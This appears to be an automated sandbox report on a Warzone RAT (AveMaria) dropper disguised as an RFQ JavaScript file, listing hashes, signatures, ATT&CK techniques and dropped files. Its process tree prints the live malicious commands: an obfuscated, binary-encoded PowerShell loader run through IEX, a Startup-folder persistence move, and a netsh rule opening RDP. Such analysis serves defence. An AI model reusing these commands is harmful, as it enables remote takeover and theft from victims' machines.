Overview

overview

10

Static

static

RFQ scope ...nts.js

windows7-x64

10

RFQ scope ...nts.js

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    183s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    29-11-2022 10:30

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    RFQ scope of requirements.js

  • Size

    2KB

  • MD5

    84ae648af28a2f5acd3c67fabde24615

  • SHA1

    45a9a2ddd9b5d8fedd6c5767cdb0bafb95c6d72b

  • SHA256

    c3db9d461440908e3278fda059adb00e9f546a3dd8dd38f80a6cee93372ae15d

  • SHA512

    7262173a3d69a54489b57087380e056b4f789343e9e0fe58efc5d0efbe1f166df44360bf1f9a2dba96b04afc5cac272cb3b262bd1eeda1c347131fa2db38468d

Score
10/10
warzoneratevasioninfostealerpersistenceratupx

Malware Config

Signatures

  • WarzoneRat, AveMaria

    WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.

    ratinfostealerwarzonerat
  • Warzone RAT payload 5 IoCs
    rat
  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
    evasion
  • Sets DLL path for service in the registry 2 TTPs 1 IoCs
    persistence
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 3 IoCs
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 38 IoCs
    adwarespyware
  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 48 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of WriteProcessMemory 31 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe "C:\Users\Admin\AppData\Local\Temp\RFQ scope of requirements.js"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:5088
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Can’t reach this page Can’t reach this page Make sure the web address http://104.223.67.151 is correct Search for this site on Bing Refresh the page Check that all network cables are plugged in. Verify that airplane mode is turned off. Make sure your wireless switch is turned on. See if you can connect to mobile broadband. Restart your router. More information <id id="moreInformation">More information</id> This website could not be found. Error Code: INET_E_RESOURCE_NOT_FOUND Fix connection problems
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3544
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Move-Item 'C:\Users\Admin\AppData\Local\Temp\RFQ scope of requirements.js' 'C:\Users\Admin\\AppData\\Roaming\\Microsoft\\Windows\Start Menu\Programs\Startup\'
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: RenamesItself
      • Suspicious use of AdjustPrivilegeToken
      PID:3016
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" function ermkflll { $o00=[char]105 + 'EX';sal P $o00 $gf=('55155155,51555151,51115515,51115515,51151111,51115515,51555551,51155511,51115155,51151551,51151111,51151115,51515555,51115515,51155151,51155115,51155151,51115515,51155151,51151115,51155511,51155151,55155555,55111151,55155555,55155111,51515511,51151551,51151155,51155151,51151115,51115155,51151155,51111551,51555511,51151111,51151115,51115155,51151551,51151115,51115151,51155151,55155111,55111511,55155155,51115155,55115151,55115115,51155115,51155111,55155555,55111151,55155555,51511511,51555151,51151115,51115151,51151151,51511151,55111515,55111515,51515155,51151111,51551111,51155515,51151515,51155151,51155511,51115155,55151555,51511511,51515511,51111551,51115511,51115155,51155151,51151151,55151115,51551115,51155151,51115155,55151115,51515511,51155151,51155511,51115151,51115515,51151551,51115155,51111551,51515555,51115515,51151111,51115155,51151111,51155511,51151111,51151155,51515155,51111551,51115555,51155151,51511151,55151155,55155555,55115511,55115555,55115111,55115515,55151551,55111511,51511511,51515511,51111551,51115511,51115155,51155151,51151151,55151115,51551115,51155151,51115155,55151115,51515511,51155151,51115515,51115115,51151551,51155511,51155151,51515555,51151111,51151551,51151115,51115155,51551151,51155551,51151115,51155551,51155111,51155151,51115515,51511151,55111515,55111515,51515511,51155151,51155511,51115151,51115515,51151551,51115155,51111551,51515555,51115515,51151111,51115155,51151111,51155511,51151111,51151155,55155555,55111151,55155555,55155155,51115155,55115151,55115115,51155115,51155111,55111511,51555551,51155155,51155155,55151151,51515155,51111551,51115555,51155151,55155555,55151151,51555551,51115511,51115511,51155151,51151151,51155515,51151155,51111551,51551115,51155551,51151151,51155151,55155555,51551151,51151551,51155511,51115515,51151111,51115511,51151111,51155115,51115155,55151115,51515115,51151551,51115511,51115151,51155551,51151155,51555515,51155551,51115511,51151551,51155511,55111511,51155155,51151111,55155555,51111511,55155155,51115555,51151551,51151115,51155111,55155555,55111151,55155555,51115155,51155151,51115511,51115155,55151151,51155511,51151111,51151115,51151115,51155151,51155511,51115155,51151551,51151111,51151115,55155555,55151151,51155511,51151111,51151151,51115555,55155555,51155111,51151111,51151111,51155111,51151155,51155151,55151115,51155511,51151111,51151151,55155555,55151151,51155511,51151111,51115151,51151115,51115155,55155555,55115551,55155555,55151151,51515551,51115151,51151551,51155151,51115155,51111151,55155555,51115151,51151115,51115155,51151551,51151155,55155555,55151555,55155155,51115555,51151551,51151115,51155111,55151551,55111511,55155155,51115155,51115155,51111551,55111151,51515555,55151555,55155111,55151555,51551115,51155151,51115111,55151151,55155111,55151511,55155111,51551111,51155515,51151515,51155151,55155111,55151511,55155111,51155511,51115155,55155555,51551115,51155151,55155111,55151511,55155111,51115155,55151115,51515111,51155151,55155111,55151511,55155111,51155515,51555511,51151155,51151551,55155111,55151511,55155111,51155151,51151115,51115155,55151551,55155111,55151551,55111511,55155155,51151151,51115115,55111151,55155555,51511511,51551151,51151551,51155511,51115515,51151111,51115511,51151111,51155115,51115155,55151115,51515115,51151551,51115511,51115151,51155551,51151155,51555515,51155551,51115511,51151551,51155511,55151115,51551551,51151115,51115155,51155151,51115515,51155551,51155511,51115155,51151551,51151111,51151115,51511151,55111515,55111515,51555511,51155551,51151155,51151155,51555515,51111551,51151115,51155551,51151151,51155151,55151555,55155155,51115155,51115155,51111551,55151155,55155111,51555155,51151111,51115111,51151115,55155111,55155555,55151511,55155555,55155111,51151155,51151111,51155551,51155155,55155111,55155555,55151511,55155555,55155111,51515511,51115155,51115515,55155111,55155555,55151511,55155555,55155111,51151551,51151115,51155111,55155111,55151155,51511511,51551151,51151551,51155511,51115515,51151111,51115511,51151111,51155115,51115155,55151115,51515115,51151551,51115511,51115151,51155551,51151155,51555515,51155551,51115511,51151551,51155511,55151115,51555511,51155551,51151155,51151155,51515155,51111551,51115555,51155151,51511151,55111515,55111515,51551151,51155151,51115155,51151555,51151111,51155155,55151155,55155111,51151555,51115155,51115155,51115555,55155111,55155555,55151511,55155555,55155111,55111515,55151111,55151111,51151555,51115551,51151115,51115111,51151555,51155551,55151115,51111555,51111551,51111515,55151111,51115111,51115555,55151111,51115511,51151551,51155151,55151115,51151515,51115555,51155111,55155111,55151551,51111155,51515555'.replace('5','0')|IEX) | %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) } (('[syst' + 'em.Str' + 'ing]::Join('''', $gf)')|P)|P } ermkflll
      2⤵
      • Blocklisted process makes network request
      • Loads dropped DLL
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2844
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
        3⤵
        • Sets DLL path for service in the registry
        • Drops file in System32 directory
        • Drops file in Program Files directory
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:4068
        • C:\Users\Admin\AppData\Local\Temp\110.exe
          "C:\Users\Admin\AppData\Local\Temp\110.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:3688
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="3389" dir=in action=allow protocol=TCP localport=3389
            5⤵
            • Modifies Windows Firewall
            PID:4232
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Move-Item 'C:\Users\Admin\AppData\Local\Temp\RFQ scope of requirements.js' 'C:\Users\Admin\\AppData\\Roaming\\Microsoft\\Windows\Start Menu\Programs\Startup\'
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1380
  • C:\Program Files (x86)\Internet Explorer\ielowutil.exe
    "C:\Program Files (x86)\Internet Explorer\ielowutil.exe" -CLSID:{0002DF01-0000-0000-C000-000000000046} -Embedding
    1⤵
      PID:2040
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
      1⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1512
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1512 CREDAT:17410 /prefetch:2
        2⤵
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:1976
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1512 CREDAT:82952 /prefetch:2
        2⤵
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:2504
    • C:\Windows\System32\svchost.exe
      C:\Windows\System32\svchost.exe -k NetworkService -s TermService
      1⤵
        PID:3288
      • C:\Windows\System32\svchost.exe
        C:\Windows\System32\svchost.exe -k NetworkService -s TermService
        1⤵
        • Loads dropped DLL
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3860

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Initial Access

      Execution

      Persistence

      Modify Existing Service

      1
      T1031

      Registry Run Keys / Startup Folder

      1
      T1060

      Privilege Escalation

      Defense Evasion

      Modify Registry

      2
      T1112

      Credential Access

      Discovery

      Query Registry

      1
      T1012

      System Information Discovery

      2
      T1082

      Lateral Movement

      Collection

      Exfiltration

      Command and Control

      Impact

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Program Files\Microsoft DN1\sqlmap.dll
        Filesize

        114KB

        MD5

        461ade40b800ae80a40985594e1ac236

        SHA1

        b3892eef846c044a2b0785d54a432b3e93a968c8

        SHA256

        798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4

        SHA512

        421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26

        Download Submit
      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
        Filesize

        471B

        MD5

        bd4f3cb3175ff83bbc2c827705950a60

        SHA1

        9d940539de8317a8a6444559d9fc9f190dd9f80b

        SHA256

        ff821119d7d2bf9d795503ed63996c81611b84cdcdacac943da9a9ae2d0d2384

        SHA512

        02b99cb5a7e2cf6004fd010c5718f85830aca7b6f43b5ed929d2df8ca4209a29cfd9e54280a35392b2617ab58e578c097834ce24e9baa8b226c6181c64c0d377

        Download Submit
      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
        Filesize

        434B

        MD5

        e6347740be8708efab6ea77b64a21632

        SHA1

        65b98ec9b7ab6da1605eef98f47f744803232fed

        SHA256

        0a8ed9b470861dd88692832e0056a983eeec198b8ad88a23367c6f6c6d4d3f78

        SHA512

        224dd590b293eb763dc61b361d929a162938f8dd90f1fedfd5619b5813f32b8cc0510129419019c3301c4bcc3193e639e3f8abf7af19a907e5a47cc47dd68e26

        Download Submit
      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
        Filesize

        2KB

        MD5

        6cf293cb4d80be23433eecf74ddb5503

        SHA1

        24fe4752df102c2ef492954d6b046cb5512ad408

        SHA256

        b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

        SHA512

        0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

        Download Submit
      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        944B

        MD5

        d28a889fd956d5cb3accfbaf1143eb6f

        SHA1

        157ba54b365341f8ff06707d996b3635da8446f7

        SHA256

        21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

        SHA512

        0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

        Download Submit
      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        944B

        MD5

        d28a889fd956d5cb3accfbaf1143eb6f

        SHA1

        157ba54b365341f8ff06707d996b3635da8446f7

        SHA256

        21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

        SHA512

        0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

        Download Submit
      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        d48c6ff9af25e5ab8db50534e5033a2d

        SHA1

        92d88a90bd0ab6ed73c60d0fff92cd514a9de623

        SHA256

        8a353cbc1d2fe9b22bb851610aa8f2fdff9f5e337845df182e6a89cf997631a4

        SHA512

        c82209e589e9761e2abddb619d5a1b2a94b2d2c8ef77a76812b3a44f3ab18257b31cd9f2dae117c3d69552ee0de8cd73a19cda94a960065e04c039b4dd54725c

        Download Submit
      • C:\Users\Admin\AppData\Local\Temp\110.exe
        Filesize

        70KB

        MD5

        ca96229390a0e6a53e8f2125f2c01114

        SHA1

        a54b1081cf58724f8cb292b4d165dfee2fb1c9f6

        SHA256

        0df3d05900e7b530f6c2a281d43c47839f2cf2a5d386553c8dc46e463a635a2c

        SHA512

        e93445bce6c8b6f51890309577a0ea9369860d2e6bf8cc0ca708879a77bb176d27c5f559bbdb7deb4b719aee0fc48d9068c293559f7629baf4ec3515898102ef

        Download Submit
      • C:\Users\Admin\AppData\Local\Temp\110.exe
        Filesize

        70KB

        MD5

        ca96229390a0e6a53e8f2125f2c01114

        SHA1

        a54b1081cf58724f8cb292b4d165dfee2fb1c9f6

        SHA256

        0df3d05900e7b530f6c2a281d43c47839f2cf2a5d386553c8dc46e463a635a2c

        SHA512

        e93445bce6c8b6f51890309577a0ea9369860d2e6bf8cc0ca708879a77bb176d27c5f559bbdb7deb4b719aee0fc48d9068c293559f7629baf4ec3515898102ef

        Download Submit
      • C:\Users\Admin\AppData\Local\Temp\11d5600c-2bda-4d22-b1dc-d8a970181a72\AgileDotNetRT64.dll
        Filesize

        75KB

        MD5

        42b2c266e49a3acd346b91e3b0e638c0

        SHA1

        2bc52134f03fcc51cb4e0f6c7cf70646b4df7dd1

        SHA256

        adeed015f06efa363d504a18acb671b1db4b20b23664a55c9bc28aef3283ca29

        SHA512

        770822fd681a1d98afe03f6fbe5f116321b54c8e2989fb07491811fd29fca5b666f1adf4c6900823af1271e342cacc9293e9db307c4eef852d1a253b00347a81

        Download Submit
      • C:\Users\Admin\AppData\Local\Temp\784b3b15-2b8e-42df-b11e-ec70bb6ec5f0\AgileDotNetRT64.dll
        Filesize

        75KB

        MD5

        42b2c266e49a3acd346b91e3b0e638c0

        SHA1

        2bc52134f03fcc51cb4e0f6c7cf70646b4df7dd1

        SHA256

        adeed015f06efa363d504a18acb671b1db4b20b23664a55c9bc28aef3283ca29

        SHA512

        770822fd681a1d98afe03f6fbe5f116321b54c8e2989fb07491811fd29fca5b666f1adf4c6900823af1271e342cacc9293e9db307c4eef852d1a253b00347a81

        Download Submit
      • \??\c:\program files\microsoft dn1\rdpwrap.ini
        Filesize

        291KB

        MD5

        914d30cdc026d77366e6ac105cd5eefc

        SHA1

        95e0c8463f4995bf126fa0cffab4a8a947963a1a

        SHA256

        f00109618610375ea494b1406fa7e5548d75a52669b1bf1761a80394301b42f8

        SHA512

        184c1c12c18b02e27a8674476c768b0dcaef7dff722dfd27e4f342ba7ce65653c399eed0bedc3d9cbca0fec0fa5a17077e8e71f4d7807e2119eec1687ccc7635

        Download Submit
      • \??\c:\program files\microsoft dn1\sqlmap.dll
        Filesize

        114KB

        MD5

        461ade40b800ae80a40985594e1ac236

        SHA1

        b3892eef846c044a2b0785d54a432b3e93a968c8

        SHA256

        798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4

        SHA512

        421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26

        Download Submit
      • memory/1380-145-0x00007FF816300000-0x00007FF816DC1000-memory.dmp
        Filesize

        10.8MB

        Download
      • memory/1380-146-0x00007FF816300000-0x00007FF816DC1000-memory.dmp
        Filesize

        10.8MB

        Download
      • memory/1380-142-0x0000000000000000-mapping.dmp
        Download
      • memory/2844-148-0x00007FF80F0A0000-0x00007FF80F1EE000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/2844-141-0x0000000000000000-mapping.dmp
        Download
      • memory/2844-144-0x00007FF816300000-0x00007FF816DC1000-memory.dmp
        Filesize

        10.8MB

        Download
      • memory/2844-156-0x00007FF816300000-0x00007FF816DC1000-memory.dmp
        Filesize

        10.8MB

        Download
      • memory/3016-135-0x00007FF8163C0000-0x00007FF816E81000-memory.dmp
        Filesize

        10.8MB

        Download
      • memory/3016-133-0x0000000000000000-mapping.dmp
        Download
      • memory/3016-134-0x0000012B56310000-0x0000012B56332000-memory.dmp
        Filesize

        136KB

        Download
      • memory/3016-137-0x00007FF8163C0000-0x00007FF816E81000-memory.dmp
        Filesize

        10.8MB

        Download
      • memory/3544-140-0x00007FF8163C0000-0x00007FF816E81000-memory.dmp
        Filesize

        10.8MB

        Download
      • memory/3544-136-0x00007FF8163C0000-0x00007FF816E81000-memory.dmp
        Filesize

        10.8MB

        Download
      • memory/3544-132-0x0000000000000000-mapping.dmp
        Download
      • memory/3688-169-0x0000000000330000-0x000000000035D000-memory.dmp
        Filesize

        180KB

        Download
      • memory/3688-165-0x0000000000330000-0x000000000035D000-memory.dmp
        Filesize

        180KB

        Download
      • memory/3688-161-0x0000000000000000-mapping.dmp
        Download
      • memory/4068-150-0x0000000000400000-0x0000000000568000-memory.dmp
        Filesize

        1.4MB

        Download
      • memory/4068-160-0x000000000B0A0000-0x000000000B240000-memory.dmp
        Filesize

        1.6MB

        Download
      • memory/4068-157-0x0000000000400000-0x0000000000568000-memory.dmp
        Filesize

        1.4MB

        Download
      • memory/4068-155-0x0000000000400000-0x0000000000568000-memory.dmp
        Filesize

        1.4MB

        Download
      • memory/4068-154-0x0000000000400000-0x0000000000568000-memory.dmp
        Filesize

        1.4MB

        Download
      • memory/4068-151-0x000000000040B556-mapping.dmp
        Download
      • memory/4232-164-0x0000000000000000-mapping.dmp
        Download